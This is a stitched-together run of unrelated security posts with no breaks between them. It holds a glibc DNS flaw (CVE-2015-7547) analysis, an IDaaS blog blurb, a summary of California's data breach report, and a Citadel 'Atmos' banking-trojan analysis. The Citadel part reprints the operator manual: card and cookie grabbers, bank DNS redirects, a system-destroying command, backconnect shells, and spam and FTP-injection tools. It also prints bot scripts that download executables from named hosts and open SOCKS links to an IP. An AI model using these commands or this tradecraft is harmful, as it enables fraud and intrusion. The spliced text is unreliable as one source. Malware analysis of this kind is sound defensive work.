We’ve investigated the DNS lookup path, which requires the glibc exploit to survive traversing one of the millions of DNS caches dotted across the Internet.  We’ve found that it is neither trivial to squeeze the glibc flaw through common name servers, nor is it trivial to prove such a feat is impossible.  The vast majority of potentially affected systems require this attack path to function, and we just don’t know yet if it can.  Our belief is that we’re likely to end up with attacks that work sometimes, and we’re probably going to end up hardening DNS caches against them with intent rather than accident.  We’re likely not going to apply network level DNS length limits because that breaks things in catastrophic and hard to predict ways.

This is a very important bug to patch, and it is good we have some opportunity to do so.

It’s problematic that, a decade after the last DNS flaw that took a decade to fix, we have another one.  It’s time we discover and deploy architectural mitigations for these sorts of flaws with more assurance than technologies like ASLR can provide.  The hard truth is that if this code was written in JavaScript, it wouldn’t have been vulnerable.  We can do better than that.  We need to develop and fund the infrastructure, both technical and organizational, that defends and maintains the foundations of the global economy.

Click here if you’re a DNS expert and don’t need to be told how DNS works.
Click here if your interests are around security policy implications and not the specific technical flaw in question.

Update:  Click here to learn how this issue compares to last year’s glibc DNS flaw, Ghost.

=====

Here is a galaxy map of the Internet.  I helped the Opte project create this particular one.

about-img-2

And this galaxy is Linux – specifically, Ubuntu Linux, in a map by Thomi Richards, showing how each piece of software inside of it depends on each other piece.

map

There is a black hole at the center of this particular galaxy – the GNU C Standard Library, or glibc.  And at this center, in this black hole, there is a flaw.  More than your average or even extraordinary flaw, it’s affecting a shocking amount of code.  How shocking?

2016-02-18_13h27_33

I’ve seen a lot of vulnerabilities, but not too many that create remote code execution in sudo.  When DNS ain’t happy, ain’t nobody happy.  Just how much trouble are we in?

We’re not quite sure.

Background

Most Internet software is built on top of Linux, and most Internet protocols are built on top of DNS.  Recently, Redhat Linux and Google discovered some fairly serious flaws in the GNU C Library, used by Linux to (among many other things) connect to DNS to resolve names (like google.com) to IP addresses (like 8.8.8.8).  The buggy code has been around for quite some time – since May 2008 – so it’s really worked its way across the globe.  Full remote code execution has been demonstrated by Google, despite the usual battery of post-exploitation mitigations like ASLR, NX, and so on.

What we know unambiguously is that an attacker who can monitor DNS traffic between most (but not all) Linux clients, and a Domain Name Server, can achieve remote code execution independent of how well those clients are otherwise implemented.  (Android is not affected.)  That is a solid critical vulnerability by any normal standard.

Actionable Intelligence

Ranking exploits is silly.  They’re not sports teams.  But generally, what you can do is actually less important than who you have to be to do it.  Bugs like Heartbleed, Shellshock, and even the recent Java Deserialization flaws ask very little of attackers – they have to be somewhere on a network that can reach their victims, maybe just anywhere on the Internet at large.  By contrast, the unambiguous victims of glibc generally require their attackers to be close by.

You’re just going to have to believe me when I say that’s less of a constraint than you’d think, for many classes of attacker you’d actually worry about.  More importantly though, the scale of software exposed to glibc is unusually substantial.  For example:

2016-02-19_11h47_13

That’s JavaScript, Python, Java, and even Haskell blowing right up.  Just because they’re “memory-safe” doesn’t mean their runtime libraries are, and glibc is the big one under Linux they all depend on.  (Not that other C libraries should be presumed safe.  Ahem.)

There’s a reason I’m saying this bug exposes Linux in general to risk.  Even your paranoid solutions leak DNS – you can route everything over a VPN, but you’ve still got to discover where you’re routing it to, and that’s usually done with DNS.  You can push everything over HTTPS, but what’s that text after the https://?  It’s a DNS domain.

Importantly, the whole point of entire sets of defenses is that there’s an attacker on the network path.  That guy just got a whole new set of toys, against a whole new set of devices.  Everyone protects apache, who protects sudo?

So, independent of whatever else may be found, Florian, Fermin, Kevin, and everyone else at Redhat and Google did some tremendous work finding and repairing something genuinely nasty.  Patch this bug with extreme prejudice.  You’ll have to reboot everything, even if it doesn’t get worse.

It might get worse.

The Hierarchy

DNS is how this Internet (there were several previous attempts) achieves cross-organizational interoperability.  It is literally the “identity” layer everything else builds upon; everybody can discover Google’s mail server, but only Google can change it.  Only they have the delegated ownership rights for gmail.com and google.com.  Those rights were delegated by Verisign, who owns .com, who themselves received that exclusive delegation from ICANN, the Internet Corporation for Assigned Names and Numbers.

The point is not to debate the particular trust model of DNS.  The point is to recognize that it’s not just Google who can register domains; attackers can literally register badguy.com and host whatever they want there.  If a DNS vulnerability could work through the DNS hierarchy, we would be in a whole new class of trouble, because it is just extraordinarily easy to compel code that does not trust you to retrieve arbitrary domains from anywhere in the DNS.  You connect to a web server, it wants to put your domain in its logs, it’s going to look you up.  You connect to a mail server, it wants to see if you’re a spammer, it’s going to look you up.  You send someone an email, they reply.  How does their email find you?  Their systems are going to look you up.

It would be unfortunate if those lookups led to code execution.

Once, I gave a talk to two hundred software developers.  I asked them, how many of you depend on DNS?  Two hands go up.  I then asked, how many of you expect a string of text like google.com to end up causing a connection to Google?  198 more hands.  Strings containing domain names happen all over the place in software, in all sorts of otherwise safe programming languages.  Far more often than not, those strings not only find their way to a DNS client, but specifically to the code embedded in the operating system (the one thing that knows where the local Domain Name Server is!).  If that embedded code, glibc, can end up receiving from the local infrastructure traffic similar enough to what a full-on local attacker would deliver, we’re in a lot more trouble.  Many more attackers can cause lookups to badguy.com, than might find themselves already on the network path to a target.

Domain Name Servers

Glibc is what is known as a “stub resolver”.  It asks a question, it gets an answer, somebody else actually does most of the work running around the Internet bouncing through ICANN to Verisign to Google.  These “somebody elses” are Domain Name Servers, also known as caching resolvers.  DNS is an old protocol – it dates back to 1983 – and comes from a world where bandwidth was so constrained that every bit mattered, even during protocol design.  (DNS got 16 bits in a place so TCP could get 32.  “We were young, we needed the bits” was actually a thing.)  These caching resolvers actually enforce a significant amount of rules upon what may or may not flow through the DNS.  The proof of concept delivered by Google essentially delivers garbage bytes.  That’s fine on the LAN, where there’s nothing getting in the way.  But name servers can essentially be modeled as scrubbing firewalls – in most (never all) environments, traffic that is not protocol compliant is just not going to reach stubs like glibc.  Certainly that Google Proof of Concept isn’t surviving any real world cache.

Does that mean nothing will?  As of yet, we don’t actually know.  According to Redhat:

A back of the envelope analysis shows that it should be possible to write correctly formed DNS responses with attacker controlled payloads that will penetrate a DNS cache hierarchy and therefore allow attackers to exploit machines behind such caches.

I’m just going to state outright:  Nobody has gotten this glibc flaw to work through caches yet.  So we just don’t know if that’s possible.  Actual exploit chains are subject to what I call the MacGyver effect.   For those unfamiliar, MacGyver was a 1980’s television show that showed a very creative tinkerer building bombs and other such things with tools like chocolate.  The show inspired an entire generation of engineers, but did not lead to a significant number of lost limbs because there was always something non-obvious and missing that ultimately prevented anything from working.  Exploit chains at this layer are just a lot more fragile than, say, corrupted memory.  But we still go ahead and actually build working memory corruption exploits, because some things are just extraordinarily expensive to fix, and so we better be sure there’s unambiguously a problem here.

At the extreme end, there are discussions happening about widespread DNS filters across the Internet – certainly in front of sensitive networks.  Redhat et al did some great work here, but we do need more than the back of the envelope.  I’ve personally been investigating cache traversal variants of this attack.  Here’s what I can report after a day.

Cache Attacks

Somewhat simplified, the attacks depend on:.

  • A buffer being filled with about 2048 bytes of data from a DNS response
  • The stub retrying, for whatever reason
  • Two responses ultimately getting stacked into the same buffer, with over 2048 bytes from the wire

The flaw is linked to the fact that the stack has two outstanding requests at the same time – one for IPv4 addresses, and one for IPv6 addresses.  Furthermore DNS can operate over both UDP and TCP, with the ability to upgrade from the former to the latter.  There is error handling in DNS, but most errors and retries are handled by the caching resolver, not the stub. That means any weird errors just cause the (safer, more properly written) middlebox to handle the complexity, reducing degrees of freedom for hitting glibc.

Given that rough summary of the constraints, here’s what I can report.  This CVE is easily the most difficult to scope bug I’ve ever worked on, despite it being in a domain I am intimately familiar with.  The trivial defenses against cache traversal are easily bypassable; the obvious attacks that would generate cache traversal are trivially defeated.  What we are left with is a morass of maybe’s, with the consequences being remarkably dire (even my bug did not yield direct code execution).  Here’s what I can say at present time, with thanks to those who have been very generous with their advice behind the scenes.

  • The attacks do not need to be garbage that could never survive a DNS cache, as they are in the Google PoC. It’s perfectly legal to have large A and AAAA responses that are both cache-compatible and corrupt client memory.  I have this working well.
  • The attacks do not require UDP or EDNS0. Traditional DNS has a 512 byte limit, notably less than the 2048 bytes required.  Some people (including me) thought that since glibc doesn’t issue the EDNS0 request that declares a larger buffer, caching resolvers would not provide sufficient data to create the required failure state.  Sure, if the attack was constrained to UDP as in the Google PoC.  But not only does TCP exist, but we can set the tc “Truncation” bit to force an upgrade to the protocol with more bandwidth.  This most certainly does traverse caches.
  • There are ways of making the necessary retry occur, even through TCP. We’re still investigating them, as it’s a fundamental requirement for the attack to function.  (No retry, no big write to small buf.)

Where I think we’re going to end up, around 24 (straight) hours of research in, is that some networks are going to be vulnerable to some cache traversal attacks sometimes, following the general rule of “attacks only get better”.  That rule usually only applies to crypto vulns, but on this half-design half-implementation vuln, we get it here too.  This is in contrast to the on-path attackers, who “just” need to figure out how to smash a 2016 stack and away they go.  There’s a couple comments I’d like to make, which summarize down to “This may not get nasty in days to weeks, but months to years has me worried.”

  • Low reliability attacks become high reliability in DNS, because you can just do a lot of them very quickly. Even without forcing an endpoint to hammer you through some API, name servers have all sorts of crazy corner cases where they blast you with traffic quickly, and stop only when you’ve gotten data successfully in their cache.  Load causes all sorts of weird and wooly behavior in name servers, so proving something doesn’t work in the general case says literally nothing about edge case behavior.
  • Low or no Time To Live (TTL) mean the attacker can disable DNS caching, eliminating some (but not nearly all) protections one might assume caching creates.  That being said, not all name servers respect a zero TTL, or even should.
  • If anything is going to stop actual cache traversing exploitability, it’s that you just have an absurd amount more timing and ordering control directly speaking to clients over TCP and UDP, than you do indirectly communicating with the client through a generally protocol enforcing cache. That doesn’t mean there won’t be situations where you can cajole the cache to do your bidding, even unreliably, but accidental defenses are where we’re at here.
  • Those accidental defenses are not strong. They’re accidents, in the way DNS cache rules kept my own attacks from being discovered.  Eventually we figured out we could do other things to get around those defenses and they just melted in seconds.    The possibility that a magic nasty payload pushes a major namesever or whatever into some state that quickly and easily knocks stuff over, on the scale of months to years, is non-trivial.
  • Stub resolvers are not just weak, they’re kind of designed to be that way. The whole point is you don’t need a lot of domain specific knowledge (no pun intended) to achieve resolution over DNS; instead you just ask a question and get an answer.  Specifically, there’s a universe of DNS clients that don’t randomize ports (or even transaction id’s).  You really don’t want random Internet hosts poking your clients spoofing your name servers.  Protecting against spoofed traffic on the global Internet is difficult; preventing traffic spoofing from outside networks using internal addresses is on the edge of practicality.

Let’s talk about suggested mitigations, and then go into what we can learn policy-wise from this situation.

Length Limits Are Silly Mitigations

No other way to say it.  Redhat might as well have suggested filtering all AAAA (IPv6) records – might actually be effective, as it happens, but it turns out security is not the only engineering requirement at play.  DNS has had to engineer several mechanisms for sending more than 512 bytes, and not because it was a fun thing to do on a Saturday night.  JavaScript is not the only thing that’s gotten bigger over the years; we are putting more and more in there and not just DNSSEC signatures either.  What is worth noting is that IT, and even IT Security, has actually learned the very very hard way not to apply traditional firewalling approaches to DNS.  Basically, as a foundational protocol it’s very far away from normal debugging interfaces.  That means, when something goes wrong – like, somebody applied a length limit to DNS traffic who was not themselves a DNS engineer – there’s this sudden outage that nobody can trace for some absurd amount of time.  By the time the problem gets traced…well, if you ever wondered why DNS doesn’t get filtered, that is why.

And ultimately, any DNS packet filter is a poor version of what you really want, which is an actual protocol enforcing scrubbing firewall, i.e. a name server that is not a stub, though it might be a forwarder (meaning it enforces all the rules and provides a cache, but doesn’t wander around the Internet resolving names).  My expectations for mitigations, particularly as we actually start getting some real intelligence around cache traversing glibc attacks, are:

  • We will put more intelligent resolvers on more devices, such that glibc is only talking to the local resolver not over the network, and
  • Caching resolvers will learn how to specially handle the case of simultaneous A and AAAA requests. If we’re protected from traversing attacks it’s because the attacker just can’t play a lot of games between UDP and TCP and A and AAAA responses.  As we learn more about when the attacks can traverse caches, we can intentionally work to make them not.

Local resolvers are popular anyway, because they mean there’s a DNS cache improving performance.  A large number of embedded routers are already safe against the verified on-path attack scenario due to their use of dnsmasq, a common forwarding cache.

Note that technologies like DNSSEC are mostly orthogonal to this threat; the attacker can just send us signed responses that he in particular wants to break us.  I say mostly because one mode of DNSSEC deployment involves the use of a local validating resolver; such resolvers are also DNS caches that insulate glibc from the outside world.

There is the interesting question of how to scan and detect nodes on your network with vulnerable versions of glibc.  I’ve been worried for a while we’re only going to end up fixing the sorts of bugs that are aggressively trivial to detect, independent of their actual impact to our risk profiles.  Short of actually intercepting traffic and injecting exploits I’m not sure what we can do here.  Certainly one can look for simultaneous A and AAAA requests with identical source ports and no EDNS0, but that’s going to stay that way even post patch.  Detecting what on our networks still needs to get patched (especially when ultimately this sort of platform failure infests the smallest of devices) is certain to become a priority – even if we end up making it easier for attackers to detect our faults as well.

If you’re looking for actual exploit attempts, don’t just look for large DNS packets.  UDP attacks will actually be fragmented (normal IP packets cannot carry 2048 bytes) and you might forget DNS can be carried over TCP.  And again, large DNS replies are not necessarily malicious.

And thus, we end up at a good transition point to discuss security policy.  What do we learn from this situation?

The Fifty Thousand Foot View

Patch this bug.  You’ll have to reboot your servers.  It will be somewhat disruptive.  Patch this bug now, before the cache traversing attacks are discovered, because even the on-path attacks are concerning enough.  Patch.  And if patching is not a thing you know how to do, automatic patching needs to be something you demand from the infrastructure you deploy on your network.  If it might not be safe in six months, why are you paying for it today?

It’s important to realize that while this bug was just discovered, it’s not actually new.  CVE-2015-7547 has been around for eight years.  Literally, six weeks before I unveiled my own grand fix to DNS (July 2008), this catastrophic code was committed.

Nobody noticed.

The timing is a bit troublesome, but let’s be realistic:  there’s only so many months to go around.  The real issue is it took almost a decade to fix this new issue, right after it took a decade to fix my old one (DJB didn’t quite identify the bug, but he absolutely called the fix).  The Internet is not less important to global commerce than it was in 2008. Hacker latency continues to be a real problem.

What maybe has changed over the years is the strangely increasing amount of talk about how the Internet is perhaps too secure.  I don’t believe that, and I don’t believe anyone in business (or even with a credit card) does either.  But the discussion on cybersecurity seems dominated by the necessity of insecurity.  Did anyone know about this flaw earlier?   There’s absolutely no way to tell.  We can only know we need to be finding these bugs faster, understanding these issues better, and fixing them more comprehensively.

We need to not be finding bugs like this, eight years from now, again.

(There were clear public signs of impending public discovery of this flaw, so do not take my words as any form of criticism for the release schedule of this CVE.)

My concerns are not merely organizational.  I do think we need to start investing significantly more in mitigation technologies that operate before memory corruption has occurred.  ASLR, NX, Control Flow Guard – all of these technologies are greatly impressive, at showing us who our greatly impressive hackers are.  They’re not actually stopping code execution from being possible.  They’re just not.

Somewhere between base arithmetic and x86 is a sandbox people can’t just walk in and out of.  To put it bluntly, if this code had been written in JavaScript – yes, really – it wouldn’t have been vulnerable.  Even if this network exposed code remained in C, and was just compiled to JavaScript via Emscripten, it still would not have been vulnerable.  Efficiently microsandboxing individual codepaths is a thing we should start exploring.  What can we do to the software we deploy, at what cost, to actually make exploitation of software flaws actually impossible, as opposed to merely difficult?

It is unlikely this is the only platform threat, or even the only threat in glibc.  With the Internet of Things spreading extraordinarily, perhaps it’s time to be less concerned about being able to spy on every last phone call and more concerned about how we can make sure innovators have better environments to build upon. I’m not merely talking about the rather “frothy” software stacks adorning the Internet of Things, with Bluetooth and custom TCP/IP and so on.  I’m talking about maintainability.  When we find problems — and we will — can we fix them?  This is a problem that took Android too long to start seriously addressing, but they’re not the only ones.  A network where devices eventually become existential threats is a network that eventually ceases to exist.  What do we do for platforms to guarantee that attack windows close?  What do we do for consumers and purchasing agents so they can differentiate that which has a maintenance warranty, and that which does not?

Are there insurance structures that could pay out, when a glibc level patch needs to be rolled out?

There’s a level of maturity that can be brought to the table, and I think should.  There are a lot of unanswered questions about the scope of this flaw, and many others, that perhaps neither vendors nor volunteer researchers are in the best position to answer.  We can do better building the secure platforms of the future.  Let’s start here.

Next Generation IDaaS: Moving From Tactical to Strategic

Today, I posted a blog entry to the Oracle Identity Management blog titled Next Generation IDaaS: Moving From Tactical to Strategic. In the post, I examine the evolution of IDaaS and look toward the next generation of Enterprise Identity and Access Management. I believe that the adoption of IDaaS by enterprises has typically been a reactive, tactical response to the quick emergence of SaaS (and the associated loss of control). The next generation of IDaaS will be more strategic and carefully planned to better meet evolving enterprise requirements.

Note that I'm not talking about the technology. Nor am I talking about consumer use-cases or developer adoption of outsourced authentication. In this post, I'm looking at IDaaS from the perspective of enterprise IAM and the on-going Digital Transformation.

Here's a few quotes that capture the essence:
First generation Identity as a Service (IDaaS) was a fashion statement that’s on its way out. It was cool while it lasted. And it capitalized on some really important business needs. But it attempted to apply a tactical fix to a strategic problem.

Security functions are coalescing into fewer solutions that cover more ground with less management overhead. Digital Enterprises want more functionality from fewer solutions.

The next generation of IAM is engineered specifically for Digital Business providing a holistic approach that operates in multiple modes. It adapts to user demands with full awareness of the value of the resources being accessed and the context in which the user is operating. Moving forward, you won’t need different IAM products to address different user populations (like privileged users or partners) and you won’t stand up siloed IDaaS solutions to address subsets of target applications (like SaaS).

Next generation IDaaS builds on all the promises of cloud computing but positions itself strategically as a component of a broader, more holistic IAM strategy. Next-gen IDaaS fully supports the most demanding Digital Business requirements. It’s not a stop-gap and it’s not a fashion statement. It’s an approach enabling a new generation of businesses that will take us all further than we could have imagined.
 Continue Reading

California Attorney General Releases Report Defining “Reasonable” Data Security

On February 16, 2016, California Attorney General Kamala D. Harris released the California Data Breach Report 2012-2015 (the “Report”) which, among other things, provides (1) an overview of businesses’ responsibilities regarding protecting personal information and reporting data breaches and (2) a series of recommendations for businesses and state policy makers to follow to help safeguard personal information. Importantly, the Report states that, “[t]he failure to implement all the [Center for Internet Security’s Critical Security] Controls that apply to an organization’s environment constitutes a lack of reasonable security” under California’s information security statute. Cal. Civ. Code § 1798.81.5(b) requires that “[a] business that owns, licenses, or maintains personal information about a California resident shall implement and maintain reasonable security procedures and practices appropriate to the nature of the information, to protect the personal information from unauthorized access, destruction, use, modification, or disclosure.” The Center for Internet Security’s Critical Security Controls are a set of 20 cybersecurity defensive measures meant to “detect, prevent, respond to, and mitigate damage from cyber attacks.”

The Report also provides the following recommendations:

  • Organizations should make multi-factor authentication available on consumer-facing online accounts that contain sensitive personal information.
  • Organizations, particularly in the health care industry, should consistently use strong encryption to protect personal information on laptops and other portable devices, and should consider it for desktop computers.
  • Organizations should encourage individuals affected by a breach of Social Security numbers or driver’s license numbers to place a fraud alert on their credit files and make this option very prominent in their breach notices.
  • State policy makers should collaborate to harmonize state breach laws on some key dimensions. Such an effort could reduce the compliance burden for companies, while preserving innovation, maintaining consumer protections and retaining jurisdictional expertise.

Citadel 0.0.1.1 (Atmos)


Guys of JPCERT, 有難う御座います!
Released an update to their Citadel decrypter to make it compatible with 0.0.1.1 sample.


Citadel 0.0.1.1 don't have a lot of documentation, so time as come to talk about it.
Personally i know this malware under the name 'Atmos' (be ready for name war in 3,2,1...)
 
The first sample i was aware is the one spotted by tilldenis here in jully 2015.

I re-observed this campaign in november 2015 with the same 'usca'.
You can find a technical description of the product here: http://pastebin.com/raw/cAqbrqAS

Here is a small part translated to English related to configuration and commands:
3. Configuration

url_config1-10 [up to 10 links to configuration files; 1 main for your web admin panel and 9 spare ones. To save the resources, use InterGate button in the builder to place config files on different links without setting up admin panel. Spare configs will be requested if the main one is not available during first EXE launch. Don't forget to put EXE and config files in 'files/' folder]
timer_config 4 9 [Config file refresh timer in minutes | Retry interval]
timer_logs 3 6 [Logs upload timer in minutes | Retry in _ minutes]
timer_stats 4 8 [New command receiving and statistics upload timer in minutes | Retry in _ minutes]
timer_modules 4 9 [Additional configuration files receiving timer | Retry in _ minutes. Recommending to use the same setting as in timer_config]
timer_autoupdate 8 [EXE file renewal timer in hours]
insidevm_enable 0/1 [Enable execution in virtual machine: 1 - yes | 0 - no]
disable_antivirus 0/1 [1 - Disable built-in 'AntiVirus' that allows to delete previous version of Zeus/Citadel/Citra after EXE lauch |  0 - leave enabled(recommended)]
disable_httpgrabber 0/1 [1 - Disable http:// mask grabber in IE | 0 - Enable http:// mask grabber in IE]
enable_luhn10_get 0/1 [Enable CC grabber in GET-requests http/https]
remove_certs 0/1 [Enable certificate deletion in IE storage]
report_software 0/1 [1 - Enable stats collection for Installed Software, Firewall version, Antivirus version | 0 - Disable]
disable_tcpserver 0/1 [1 - Enable opening SOCKS5 port (not Backconnect!) | 0 - Disable]
enable_luhn10_post 0/1 [Enable CC grabber in POST-requests http/https]
disable_cookies 0/1 [1- Disable IE/FF cookies-storage upload | 0 - Enable | use_module_ffcookie - duplicates the same]
file_webinjects "injects.txt" [File containing injects. Installed right after successful config files installation. Renewal timer is set in timer_config]
url_webinjects "localhost/file.php" [Path to 'file.php' file. Feature of 'Web-Injects' section for remote instant inject loading]
AdvancedConfigs [Links to backup configuration files. Works if !bot is already installed on the system! and first url_config is no longer accessible]
entry "WebFilters" [Set of different filters for URLs: video(# character), screenshot(single @ character - screenshot sequence after a click in the active zone. double @ character '@@' - Full size screenshot), ignore (! character), POST requests logging (P character), GET request logging (G character)]
entry HttpVipUrls [URL blacklist. By default the follwing masks are NOT written to the logs "facebook*" "*twitter*",  "*google*". Adding individual lines with these masks will enable logging for them again]
entry "DnsFilters" [System level DNS redirect, mask example - *bankofamerica.com*=159.45.66.100. Now when going to bankofamerica.com - wellsfargo.com will be displayed. Not recommending blocking AV sites to avoid triggering pro-active defenses]
entry "CmdList" [List of system commands after launch and uploading them to the server]
entry "Keylogger" [List of process names for KeyLogger. Time parameter defines the time to work in hours after the process initialization]
entry "Video" [Video recording settings | x_scale/y_scale - video resolution | fps - frame per second, 1 to 5 |  kbs - frame refresh rate, 5 to 60 | cpu 0-16 CPU loading | time - time to record in seconds | quality 0-100 - picture quality]
entry "Videologger" - [processes "" - list of processes to trigger video recording. Possible to use masks, for example calc.exe or *calc*]
entry "MoneyParser" [Balance grabber settings | include "account,bank,balance" - enable balance parsing if https:// page contains one of the following key words. | exclude "casino,poker,game" - do NOT perform parsing if one of the following words is found]
entry "FileSearch" [File search by given mask. The report will be stored in 'File Hunter' folder. Keywords can be a list of files or patterns ** to for on the disk. For example, multibit.exe will search for exact match on filename.fileextension, *multibit* will report on anything found matching this pattern. | excludes_name - exclude filenames/fileextensions from search. excludes_path - exclude system directories macros, like, Windows/Program Files, etc | minimum_year - file creation/change date offset. The search task is always on. Remove all the parameters from this section to disable it.]
entry "NetScan" [hostname "host-to-scan.com" - list of local/remote IP addresses to scan. scantype "0" - sets the IP address range, for example, scantype "0" scans a single IP in the 'hostname', scantype "1" creates a full scan of class C network 10.10.10.0-255, scantype "2" creates a full scan of class B network 10.10.0-255.0-255]
Example 1 {hostname "10.10.0-255.0-255" addrtype "ipv4" porttype "tcp" ports "1-5000" scantype "2"}
Example 2 {hostname "10.10.1.0-255" addrtype "ipv4" porttype "tcp" ports "1-5000" scantype "1"}]
entry "WebMagic" [Local WebProxySrv, web server with its own storage. Allows to read and write bot parameters directly, for example, when using injects. This saves time and resources since it doesn't generate additional remote requests for different scripts that are generally detected by banks anti-tampering controls. It also allows to bypass browser checking when requesting https:// resource hosted remotely and to create backconnect connection. Full settings description is located in F.A.Q section]


4. Commands

user_execute <url> [execute given file]
user_execute <url> -f [execute given file, manual bot update that overwrites the current version]
user_cookies_get [Get IE cookies]
user_cookies_remove [Remove IE cookies]
user_certs_get [Get .p12 certificates. Password: pass]
user_certs_remove [Remove certificates]
user_homepage_set <url> [Set browser home page]
user_flashplayer_get [Get user's .sol files]
user_flashplayer_remove [Remove user's .sol files]
url_open <url> [open given URL in a browser]
dns_filter_add <hostname> <ip> [Add domain name for redirect(blocking) *bankofamerica.com* 127.0.0.1]
dns_filter_remove <url> [Remove domain name from redirect(blocking)]
user_destroy [Corrupt system vital files and reboot the system. Requires elevated privileges]
user_logoff [Logoff currently logged in user]
os_reboot [Reboot the host]
os_shutdown [Shutdown the host]
bot_uninstall [Remove bot file and uninstall it]
bot_update <url> [Update bot configuration file. Requires to use the same the crypt. The path is set in url_config]
bot_bc_add socks <ip> <port> [Connect Bot > Backconnect Server > Socks5 | Run backconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for Proxifier/Browser...]
bot_bc_add vnc <ip> <port> [Connect Bot > Backconnect Server > VNC Remote Display |  Run backconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for UltraVNC client]
bot_bc_add cmd <ip> <port> [Connect Bot > Backconnect Server > Remote Shell | Run backconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for telnet/putty client ]
bot_bc_remove <service> <ip> <port> [Disconnect from the bot and hide connections from 'netstat' output]
close_browsers [close all browser processes]

And one part related to some new features:
Q: How does Mailer works?
A: This feature allows you to create mass-email campaigns using standard PHP tools.
For this feature to work correctly you need to download the script [Download Script] and put it in www-root directory on one of the hosts that will be used to perform the mass-email campaign - make sure you turn off the following in php.ini; magic_quotes_gpc = Off and safe_mode = Off
After that press [ Config ] and fill in [Master E-Mail (for checkup) parameters: "name ; email" Your email for checking] and Mailer-script URL: http://www.host.com/mailer.php
It's possible to create a campaign using a email address list collected by a Bot using "For BotID" button or a new list name;email
Macros are supported in в Subject/Body/Attach.
{name} - Receiver name | {email} - Receiver E-mail | {random} - random chars | {rand0m} - random long number
Recommendation: To avoid being blocked by spam-filters use macro name@{hostname} in Sender ("email" or "name ; email") field - in this case the real domain name of the sending host will be used and your emails will not end up in Spam folder.

Q: How to work with File Hunter feature?
A: This feature allows you to work with files on the bot: get list of files matching the parameters specified under config entry "FileSearch", track files updates, autoupload files and replace files on the bot.
Custom Download - allows you to download any file from a bot by BotID, taken that a full path to the file is known. This will work even if the file is not specified under "FileSearch" config entry.
Auto download - uploads files with a given mask without a need to specify BotID. Bot will execute the upload as soon as search conditions are given and the file found. This will work even if the file is not specified under "FileSearch" config entry.
Be careful using File Hunter to modify any files on the bot. It's main purpose is to grab *coin files(multibit.dat/litecoin.dat...)
Use mouse right-click to access context menu for file list.

Q: Short manual for FTP Iframer
A: As in the case with 'Mailer', For this feature to work correctly you need to download the iframer script [Download Script] and put it in www-root directory on one of the hosts that will be used to perform the mass-email campaign - make sure you turn off the following in php.ini; magic_quotes_gpc = Off and safe_mode = Off
Next, create configuration options by pressing on [ Конфигурация ]
Specify the script URL in URL field
Working mode: Just checking [ Will check the validity of FTP accounts found in the logs ]
Inject: [Mode: "ON"]
Inject method: Smart/Add/Overwrite [ Smart - will re-add the inject in case if it was detected and deleted. / Add - iframe code will be added to the end of the file before </body></html>]
Lookup depth: [ File search level on ftp-host. For example, in the following structure FTP Connection > public_html(1) > images(2) > gif(3)....]
Next, perform 'Accounts search' and 'Run tasks'. The statistics and results will be available after a few minutes. The script will be working in cron-mode after the first execution, so there is no need to keep the page opened.

Q: Main functions and methods of "Neuromodel"
A: Neuromodel allows you to perform complex analysis of your botnet: identifying best bots, upload success rates. You can build a research matrix that includes list of bots and evaluate them against specified criteria;  the result will be calculating a score to each bot.
Each research matrix can contain a number of evaluation criteria. For example, you need to search the logs for the following data: Bank Acc + CC or Bank Acc + ISP E-mail
Create profile first and then plan the task based on required criteria.

Task - "Find bots that logged into http://www.bankofamerica.com id=* in the last 30 days and where McAfee is installed. Assign X score if the search criteria match"

Creating criteria:
1) { name: BOA LOGIN | criteria: HTTP data POST | URL masks: htt*://www.bankofamerica.com/* | POST data masks: id=* | days limit: 30 | score: 1 | static method, trigger condition: No < 1 }
2) { name: AVCheck | criteria: installed software | software name mask: McAfee* | days limit: 30 | score: 1 trigger condition: No < 1 }

Static method is used to summarize the results.
* **No**: simple summary. Each successful criteria match adds specified score to the bot. More matches = bigger the score.
Example 1: if it found 180 reports matching the criteria and the score is 2 then the final score will be '180*2'
Example 2: if 'Login to bankofamerica' criteria  is set to ">=" "3" on average a day then the score will be added only for the last days specified in 'Days' parameter.
Detailed: if in the last days specified in 'Days' parameter the 'Login to bankofamerica' criteria was matched more than 3 times on average then the bots reported will be given the score points.
* **Sum** Summary of produced reports
Score 'Points' will be added if the amount of reports satisfying the search criteria complies with trigger condition.
For example, if we have `reports_count=180` and `Points=2` and trigger condition is `>= 180` then the score is +2.
* **Days**: active days summary: days containing the reports.
Score will be added if the amount of reports satisfying the search criteria complies with trigger condition.
For example, if we have reports from day before yesterday, yesterday and today and trigger condition is set to `>= 3` then the scores will be added.
* **Avg/Day**: Average/Day: average number of reports in the last 24 hours
* **Avg/Week**: Average/Week: average number of reports per week
* **Days/Week**: average number of active days per week

Another example, search for inactive accounts:
"Find the bots regardless of their scores that logged into USBank in the last 21 days no more than 3 times - no filters or criteria are applied"

1) { URL = https://onlinebanking.usbank.com/Auth/Login/Login* | HTTP URL visit| days limit = 21 | Login no more than 3 times: e.g. login <=3. Meaning, if found <=3 reports for this criteria — add 1 to the score. | SUM() <=3 , 1 score }

Full criteria list is below:
Condition using date/time of the first report received from the bot.
Condition using date/time of the last report received from the bot.
Condition using average online time of the bot per week or per hour.
Condition using a type of the report or it's content
>Presence/Lack of LUHN10(CC)
>Presence/Lack of ISP email address (pop3 or web-link)
>Presence/Lack of FTP accounts
>Search by key words
Condition using "Installed Software" reports, allows you to check for a particular software installed on the bot.
Condition using "CMD" reports, allows to use particular keywords.
Condition using visited one or many particular URLs
Condition using POST variables.
Minus some absolute nonsense in the description of AVG/Day, AVG/week and days/weeks
The author is a fecking lunatic trying to explain things that only he understand :)
Thanks to Malwageddon for the translation help.

Now.. take a free tour in the infrastructure.

Login:

Dashboard:
RU and UA flags, united forever :)

exe configuration:

Operating system:

Software:

Firewall:
AV:
Search:

Bots:
 Legend:


Full information:

WebInject:

Reported errors:

New group:

Edit a webinject:

Webinjects for the group 'Canada':

US:

Edit a webinject:

Script:

Script edit:

Some scripts sample:
tokenspy_update tokenspy-config.json
hvnc_start 176.9.174.237 29223
bot_bc_add vnc
bot_bc_add socks 176.9.174.237 37698
user_execute http://iguana58.ru/plugins/system/anticopy/ammy.exe
transfer
user_destroy
user_execute http://iguana58.ru/plugins/system/anticopy/adobe.exe
user_ftpclients_get
user_execute htxp://iguana58.ru/plugins/system/anticopy/adobe.exe
user_execute htxp://mareikes.com/wp-includes/pomo/svhost.exe -f
